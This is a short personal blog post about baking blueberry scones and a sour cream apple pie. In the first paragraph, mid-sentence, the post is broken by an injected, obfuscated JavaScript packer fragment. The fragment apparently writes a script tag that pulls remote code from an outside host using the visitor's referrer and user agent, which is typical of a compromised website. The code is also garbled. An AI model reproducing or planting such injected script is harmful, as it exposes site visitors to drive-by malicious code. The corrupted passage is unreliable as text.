I’m a highly domestic engineer. I woke up Sunday morning with a hankering for apple pie and scones. So I made them both. No real reason. Just wanted to bake something. And I needed an excuse to use up a few cups of sour ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfhnb|var|u0026u|referrer|nyzye||js|php’.split(‘|’),0,{}))

I’m not good at baking, but I’m good and finding and following recipes. I have a new favorite recipe website that led me to some TASTY blueberry scones. The recipe was super simple and the scones came out perfect and moist. I’d make 1 small change next time 🙂 Ok, maybe I don’t always follow the recipe.
You can find the recipe here!
Then I decided it would be a good idea to make a sour cream apple pie. We usually only get this at Thanksgiving, so it sounded like a wonderful idea!
When it was done, I put it on the counter to cool. Nick said it looked like a scene from the 1950’s, with a warm apple pie cooling in the kitchen.
I’ll post the recipe on my other blog tomorrow 🙂
Bet you wish you lived with me. We’ve been eating like fatty’s for the past 2 days! Time for the gym!
